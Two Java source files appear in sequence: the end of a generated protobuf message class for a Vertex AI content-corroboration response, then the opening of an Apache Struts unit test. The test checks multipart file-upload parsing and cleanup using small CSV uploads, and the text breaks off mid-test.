getClaimsOrBuilder(int index) { return claims_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeFloat(1, corroborationScore_); } for (int i = 0; i < claims_.size(); i++) { output.writeMessage(2, claims_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeFloatSize(1, corroborationScore_); } for (int i = 0; i < claims_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, claims_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse other = (com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse) obj; if (hasCorroborationScore() != other.hasCorroborationScore()) return false; if (hasCorroborationScore()) { if (java.lang.Float.floatToIntBits(getCorroborationScore()) != java.lang.Float.floatToIntBits(other.getCorroborationScore())) return false; } if (!getClaimsList().equals(other.getClaimsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasCorroborationScore()) { hash = (37 * hash) + CORROBORATION_SCORE_FIELD_NUMBER; hash = (53 * hash) + java.lang.Float.floatToIntBits(getCorroborationScore()); } if (getClaimsCount() > 0) { hash = (37 * hash) + CLAIMS_FIELD_NUMBER; hash = (53 * hash) + getClaimsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for CorroborateContent. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1beta1.CorroborateContentResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) com.google.cloud.aiplatform.v1beta1.CorroborateContentResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.class, com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; corroborationScore_ = 0F; if (claimsBuilder_ == null) { claims_ = java.util.Collections.emptyList(); } else { claims_ = null; claimsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000002); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse build() { com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse buildPartial() { com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result = new com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result) { if (claimsBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0)) { claims_ = java.util.Collections.unmodifiableList(claims_); bitField0_ = (bitField0_ & ~0x00000002); } result.claims_ = claims_; } else { result.claims_ = claimsBuilder_.build(); } } private void buildPartial0( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.corroborationScore_ = corroborationScore_; to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse) { return mergeFrom((com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse other) { if (other == com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.getDefaultInstance()) return this; if (other.hasCorroborationScore()) { setCorroborationScore(other.getCorroborationScore()); } if (claimsBuilder_ == null) { if (!other.claims_.isEmpty()) { if (claims_.isEmpty()) { claims_ = other.claims_; bitField0_ = (bitField0_ & ~0x00000002); } else { ensureClaimsIsMutable(); claims_.addAll(other.claims_); } onChanged(); } } else { if (!other.claims_.isEmpty()) { if (claimsBuilder_.isEmpty()) { claimsBuilder_.dispose(); claimsBuilder_ = null; claims_ = other.claims_; bitField0_ = (bitField0_ & ~0x00000002); claimsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getClaimsFieldBuilder() : null; } else { claimsBuilder_.addAllMessages(other.claims_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 13: { corroborationScore_ = input.readFloat(); bitField0_ |= 0x00000001; break; } // case 13 case 18: { com.google.cloud.aiplatform.v1beta1.Claim m = input.readMessage( com.google.cloud.aiplatform.v1beta1.Claim.parser(), extensionRegistry); if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.add(m); } else { claimsBuilder_.addMessage(m); } break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private float corroborationScore_; /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return Whether the corroborationScore field is set. */ @java.lang.Override public boolean hasCorroborationScore() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return The corroborationScore. */ @java.lang.Override public float getCorroborationScore() { return corroborationScore_; } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @param value The corroborationScore to set. * @return This builder for chaining. */ public Builder setCorroborationScore(float value) { corroborationScore_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return This builder for chaining. */ public Builder clearCorroborationScore() { bitField0_ = (bitField0_ & ~0x00000001); corroborationScore_ = 0F; onChanged(); return this; } private java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> claims_ = java.util.Collections.emptyList(); private void ensureClaimsIsMutable() { if (!((bitField0_ & 0x00000002) != 0)) { claims_ = new java.util.ArrayList<com.google.cloud.aiplatform.v1beta1.Claim>(claims_); bitField0_ |= 0x00000002; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1beta1.Claim, com.google.cloud.aiplatform.v1beta1.Claim.Builder, com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> claimsBuilder_; /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> getClaimsList() { if (claimsBuilder_ == null) { return java.util.Collections.unmodifiableList(claims_); } else { return claimsBuilder_.getMessageList(); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public int getClaimsCount() { if (claimsBuilder_ == null) { return claims_.size(); } else { return claimsBuilder_.getCount(); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim getClaims(int index) { if (claimsBuilder_ == null) { return claims_.get(index); } else { return claimsBuilder_.getMessage(index); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder setClaims(int index, com.google.cloud.aiplatform.v1beta1.Claim value) { if (claimsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureClaimsIsMutable(); claims_.set(index, value); onChanged(); } else { claimsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder setClaims( int index, com.google.cloud.aiplatform.v1beta1.Claim.Builder builderForValue) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.set(index, builderForValue.build()); onChanged(); } else { claimsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims(com.google.cloud.aiplatform.v1beta1.Claim value) { if (claimsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureClaimsIsMutable(); claims_.add(value); onChanged(); } else { claimsBuilder_.addMessage(value); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims(int index, com.google.cloud.aiplatform.v1beta1.Claim value) { if (claimsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureClaimsIsMutable(); claims_.add(index, value); onChanged(); } else { claimsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims(com.google.cloud.aiplatform.v1beta1.Claim.Builder builderForValue) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.add(builderForValue.build()); onChanged(); } else { claimsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims( int index, com.google.cloud.aiplatform.v1beta1.Claim.Builder builderForValue) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.add(index, builderForValue.build()); onChanged(); } else { claimsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addAllClaims( java.lang.Iterable<? extends com.google.cloud.aiplatform.v1beta1.Claim> values) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, claims_); onChanged(); } else { claimsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder clearClaims() { if (claimsBuilder_ == null) { claims_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); } else { claimsBuilder_.clear(); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder removeClaims(int index) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.remove(index); onChanged(); } else { claimsBuilder_.remove(index); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim.Builder getClaimsBuilder(int index) { return getClaimsFieldBuilder().getBuilder(index); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder getClaimsOrBuilder(int index) { if (claimsBuilder_ == null) { return claims_.get(index); } else { return claimsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public java.util.List<? extends com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> getClaimsOrBuilderList() { if (claimsBuilder_ != null) { return claimsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(claims_); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim.Builder addClaimsBuilder() { return getClaimsFieldBuilder() .addBuilder(com.google.cloud.aiplatform.v1beta1.Claim.getDefaultInstance()); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim.Builder addClaimsBuilder(int index) { return getClaimsFieldBuilder() .addBuilder(index, com.google.cloud.aiplatform.v1beta1.Claim.getDefaultInstance()); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public java.util.List<com.google.cloud.aiplatform.v1beta1.Claim.Builder> getClaimsBuilderList() { return getClaimsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1beta1.Claim, com.google.cloud.aiplatform.v1beta1.Claim.Builder, com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> getClaimsFieldBuilder() { if (claimsBuilder_ == null) { claimsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1beta1.Claim, com.google.cloud.aiplatform.v1beta1.Claim.Builder, com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder>( claims_, ((bitField0_ & 0x00000002) != 0), getParentForChildren(), isClean()); claims_ = null; } return claimsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) private static final com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse(); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CorroborateContentResponse> PARSER = new com.google.protobuf.AbstractParser<CorroborateContentResponse>() { @java.lang.Override public CorroborateContentResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CorroborateContentResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CorroborateContentResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/struts
35,458
core/src/test/java/org/apache/struts2/dispatcher/multipart/AbstractMultiPartRequestTest.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.struts2.dispatcher.multipart; import org.apache.commons.fileupload2.jakarta.servlet6.JakartaServletDiskFileUpload; import org.apache.struts2.dispatcher.LocalizedMessage; import org.assertj.core.api.InstanceOfAssertFactories; import org.junit.After; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import org.springframework.mock.web.MockHttpServletRequest; import java.io.File; import java.io.IOException; import java.nio.charset.StandardCharsets; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Objects; import static org.assertj.core.api.Assertions.assertThat; abstract class AbstractMultiPartRequestTest { protected static String tempDir; protected MockHttpServletRequest mockRequest; protected final String boundary = "_boundary_"; protected final String endline = "\r\n"; protected AbstractMultiPartRequest multiPart; abstract protected AbstractMultiPartRequest createMultipartRequest(); @BeforeClass public static void beforeClass() throws IOException { File tempFile = File.createTempFile("struts", "fileupload"); assertThat(tempFile.delete()).isTrue(); assertThat(tempFile.mkdirs()).isTrue(); tempDir = tempFile.getAbsolutePath(); } @Before public void before() { mockRequest = new MockHttpServletRequest(); mockRequest.setCharacterEncoding(StandardCharsets.UTF_8.name()); mockRequest.setMethod("post"); mockRequest.setContentType("multipart/form-data; boundary=" + boundary); multiPart = createMultipartRequest(); } @After public void after() { multiPart.cleanUp(); } @Test public void uploadedFilesToDisk() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setBufferSize("1"); // always write files into disk multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1", "file2"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); }); assertThat(multiPart.getFile("file2")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test2.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file2"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); }); } @Test public void uploadedMultipleFilesToDisk() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file1", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setBufferSize("1"); // always write files into disk multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { if (Objects.equals(file.getName(), "test1.csv")) { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); } if (Objects.equals(file.getName(), "test2.csv")) { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test2.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); } }); } @Test public void uploadedFilesWithLargeBuffer() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setBufferSize("8192"); // streams files into disk using larger buffer multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1", "file2"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); }); assertThat(multiPart.getFile("file2")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test2.csv"); assertThat(file.getInputName()) .isEqualTo("file2"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); }); } @Test public void cleanUp() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1", "file2"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); }); assertThat(multiPart.getFile("file2")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test2.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file2"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); }); List<UploadedFile> uploadedFiles = new ArrayList<>(); for (Map.Entry<String, List<UploadedFile>> entry : multiPart.uploadedFiles.entrySet()) { uploadedFiles.addAll(entry.getValue()); } // when multiPart.cleanUp(); // then assertThat(multiPart.uploadedFiles) .isEmpty(); assertThat(multiPart.parameters) .isEmpty(); assertThat(uploadedFiles).allSatisfy(file -> assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .doesNotExist() ); } @Test public void nonMultiPartUpload() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", 